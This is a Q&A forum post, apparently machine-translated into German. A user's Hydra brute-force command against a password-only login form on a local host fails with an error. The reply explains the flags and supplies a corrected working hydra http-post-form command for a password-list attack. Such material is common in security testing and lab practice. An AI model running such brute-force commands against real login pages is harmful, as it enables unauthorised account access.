hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!
Ich bin nicht sicher, warum ich den Fehler erhalte, da die ^PASS^Zeichenfolge vorhanden ist. In der Anwendung ist kein Benutzername vorhanden.
Die vollständige URL des Anmeldeformulars lautet:http://192.168.0.24:1234/
Kann jemand helfen?
Antwort1
Zu Ihrer Frage:
- Bei der Verwendung einer Hydra ist es nicht erforderlich, sie
http://vor den Wirt zu stellen, den Sie angreifen möchten. - Um den Port anzugeben, verwenden Sie bitte die
-sFlagge. - Sie müssen das
-lFlag angeben, andernfalls wird ein Fehler angezeigt. - In der POST-Anfrage müssen Sie die Datei angeben, die die POST-Anfrage empfangen soll (z. B. index.php, password.php, validate.php usw.).
- Und zu guter Letzt müssen Sie den Erfolgsfall oder den Fehlerfall angeben.
Versuchen Sie den folgenden Befehl. Das ist das Beste, was ich mit den bereitgestellten Informationen erreichen kann:
hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt
Ich habe es selbst ausprobiert und es tritt keinerlei Fehler auf.
Viel Glück!